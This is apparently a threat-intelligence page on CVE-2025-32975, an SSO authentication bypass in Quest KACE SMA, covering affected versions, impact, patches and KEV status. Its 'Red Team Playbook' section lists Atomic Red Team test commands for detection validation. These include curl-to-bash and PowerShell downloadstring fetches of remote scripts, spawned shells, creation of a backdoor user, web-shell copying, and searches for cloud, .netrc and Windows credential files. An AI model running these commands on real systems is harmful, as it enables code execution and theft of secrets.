CVE-2025-32975
Overview
This vulnerability is an authentication bypass caused by improper validation in the Single Sign-On (SSO) authentication mechanism of Quest KACE Systems Management Appliance (SMA). The root cause lies in the flawed handling of authentication tokens or session states, allowing the system to incorrectly grant access without verifying legitimate credentials. The affected component is the SSO authentication handler across multiple SMA software versions prior to specified patch levels.
Vulnerability Description
Quest KACE Systems Management Appliance (SMA) 13.0.x before 13.0.385, 13.1.x before 13.1.81, 13.2.x before 13.2.183, 14.0.x before 14.0.341 (Patch 5), and 14.1.x before 14.1.101 (Patch 4) contains an authentication bypass vulnerability that allows attackers to impersonate legitimate users without valid credentials. The vulnerability exists in the SSO authentication handling mechanism and can lead to complete administrative takeover.
Impact
An unauthenticated attacker can exploit this vulnerability to gain full administrative access to the Quest KACE SMA appliance without valid credentials or user interaction. This enables complete control over the management system, including access to sensitive configuration data, user management, and potentially the ability to deploy malicious configurations or commands. The compromise of administrative privileges can lead to full system takeover and lateral movement within the managed network environment.
Solution
Apply the vendor-released patches for Quest KACE SMA as detailed in the official advisory at https://support.quest.com/kb/4379499. Specifically, upgrade to versions 13.0.385 or later, 13.1.81 or later, 13.2.183 or later, 14.0.341 (Patch 5) or later, and 14.1.101 (Patch 4) or later. Follow the vendor's patch installation instructions to ensure the authentication bypass is fully mitigated.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The authentication bypass vulnerability present in the Quest KACE Systems Management Appliance (SMA) poses a significant threat to organizations relying on this platform for systems management. This flaw exists within the Single Sign-On (SSO) authentication handling mechanism, which is designed to streamline user access across various services. However, due to inadequate validation of authentication tokens, attackers can exploit this weakness to impersonate legitimate users, gaining unauthorized access to sensitive administrative functions without presenting valid credentials. The severity of this vulnerability is underscored by its perfect score on the Common Vulnerability Scoring System (CVSS), indicating a critical risk that warrants immediate attention.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage social engineering tactics to gain initial access to the network or utilize phishing techniques to trick users into providing their credentials. Once inside the network, the attacker can exploit the authentication bypass to escalate privileges and assume the identity of legitimate users, including administrators. This unauthorized access could lead to the manipulation of system configurations, data exfiltration, or even the deployment of malware across the managed devices. The potential for such exploitation is exacerbated in environments where the KACE SMA is integrated with other critical systems, amplifying the impact of a successful attack.
The real-world implications of this vulnerability are profound. Organizations utilizing the affected versions of the KACE SMA are at risk of severe operational disruptions, reputational damage, and financial loss. An attacker gaining administrative control can alter system settings, disable security features, or exfiltrate sensitive data, leading to compliance violations and potential legal repercussions. Furthermore, the ability to impersonate legitimate users can result in a loss of trust from customers and partners, as well as increased scrutiny from regulatory bodies. The financial ramifications can be significant, with costs associated with incident response, remediation, and potential fines for data breaches.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating the KACE SMA to the latest patched versions is crucial to closing the security gap. Implementing robust monitoring solutions can help identify unusual access patterns or unauthorized changes to system configurations, enabling early detection of potential exploitation attempts. Additionally, organizations should enforce strict access controls and employ multi-factor authentication (MFA) to further secure user accounts, making it more difficult for attackers to gain unauthorized access. Conducting regular security audits and penetration testing can also help identify and address vulnerabilities before they can be exploited.
In conclusion, the authentication bypass vulnerability in the Quest KACE Systems Management Appliance represents a critical threat to organizations that depend on this technology for systems management. The potential for unauthorized administrative access can lead to significant operational and financial consequences. By prioritizing timely updates, implementing strong access controls, and maintaining vigilant monitoring practices, organizations can mitigate the risks associated with this vulnerability and enhance their overall security posture.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2025-32975, coinciding with its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. This formal recognition underscores the vulnerability’s criticality and imminent risk to affected environments. Our telemetry indicates a rapid and significant increase in exploitation attempts, reflected by a surge in the Exploit Prediction Scoring System (EPSS) score to the 99th percentile, signaling that adversaries are increasingly prioritizing this authentication bypass flaw. The elevation of the CVSS score to 10.0 further emphasizes the potential for complete administrative compromise without valid credentials, heightening the urgency for defenders to reassess exposure. Although no new exploit variants have been publicly disclosed, the sharp rise in exploitation activity suggests that threat actors are actively leveraging this vulnerability in the wild. Consequently, the threat level associated with CVE-2025-32975 has escalated from theoretical to imminent, demanding heightened vigilance within organizations utilizing affected Quest KACE Systems Management Appliance versions.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Quest | Kace Systems Management Appliance | All |
cpe:2.3:a:quest:kace_systems_management_appliance:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-32975 |
| support.quest.com |
GitHub CVE
|
https://support.quest.com/kb/4379499/quest-response-to-kace-sma-vulnerabilities-cve-2025-32975-cve-2025-32976-cve-2025-32977-cve-2025-32978 |
| seclists.org |
GitHub CVE
|
https://seclists.org/fulldisclosure/2025/Jun/22 |
| seralys.com |
GitHub CVE
|
https://seralys.com/research/CVE-2025-32975.txt |
| seclists.org |
NVD API
|
http://seclists.org/fulldisclosure/2025/Jun/25 |
| cisa.gov |
NVD API
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-32975 |